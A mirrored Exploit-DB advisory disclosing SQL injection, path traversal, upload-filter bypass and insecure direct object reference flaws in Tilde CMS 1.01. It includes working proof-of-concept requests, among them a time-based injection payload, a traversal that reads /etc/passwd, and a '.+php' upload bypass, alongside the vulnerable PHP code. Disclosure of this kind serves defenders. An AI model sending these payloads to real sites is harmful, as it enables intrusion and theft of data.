Tilde CMS 1.01 – Multiple Vulnerabilities

• Exploit Database
• 25 阅读

• 作者： Raffaele Forte
  日期： 2017-07-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42348/

• # Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
  # Date: July 7th, 2017
  # Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
  # Vendor Homepage: http://www.tildenetwork.com/
  # Version: Tilde CMS 1.0.1
  # Tested on: Ubuntu 12.04, PHP 5.3.10
  
  
  I. INTRODUCTION
  ========================================================================
  Tilde CMS is closed-source content management system created by 
  tildenetwork.com
  
  
  II. DESCRIPTION
  ========================================================================
  The web application suffers of multiple vulnerabilities.
  
  1. SQL Injection
  ------------------------------------------------------------------------
  Due to missing escaping of the backtick character, the following query in 
  the source code is vulnerable:
  
  [class.SystemAction.php]
  
  	$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
  	$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);
  
  The vulnerability can be trigged via a POST request as shown in the
  following PoC: 
  
  	POST /actionphp/action.input.php HTTP/1.1
  
  	ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE 
  	SLEEP(5)-- aaa &idForm=1234567890
  
  The resulting query on the server-side will be:
  	SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'
  
  For a succesful exploitation, the table "form_table_1" must be valid.
  
  
  2. Path Traversal
  ------------------------------------------------------------------------
  The vulnerabilty exists on this method:
  
  	GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
  
  
  3. Arbitrary Files Upload
  ------------------------------------------------------------------------
  It is possible to bypass the implemented restrictions shown in the 
  following snippet of the code:
  
  	$file=$_FILES['file'.$i]['tmp_name'];
  	if (($file!="")&&($file!="none")) {
  		$source_file=$file;
  		$file_name=$_FILES['file'.$i]['name'];
  		$file_name=str_replace(".php",".txt",$file_name);
  		$file_name=str_replace(" ","_",$file_name);
  		$file_name=str_replace("+","",$file_name);
  
  A file named "filename.+php" will be renamed in "filename.php", therefore 
  successfully uploaded.
  
  
  4. Insecure Direct Object References
  ------------------------------------------------------------------------
  It is possible to retrieve sensitive resources by using direct references.
  A low privileged user can load the PHP resources such as: 
  
  	admin/content.php
  	admin/content.php?method=ftp_upload
  
  
  IV. BUSINESS IMPACT
  ========================================================================
  These flaws may compromise the integrity of the system and/or expose 
  sensitive information.
  
  
  V. SYSTEMS AFFECTED
  ========================================================================
  Tilde CMS 1.01 is vulnerable (probably all previous versions)
  
  
  VI. VULNERABILITY HISTORY
  ========================================================================
  July 6th, 2017: Vulnerability identification
  July 7th, 2017: Vendor notification
  July 13th, 2017: Vendor notification
  
  
  VII. LEGAL NOTICES
  ========================================================================
  The information contained within this advisory is supplied "as-is" with 
  no warranties or guarantees of fitness of use or otherwise. We accept no
  responsibility for any damage caused by the use or misuseof this 
  information.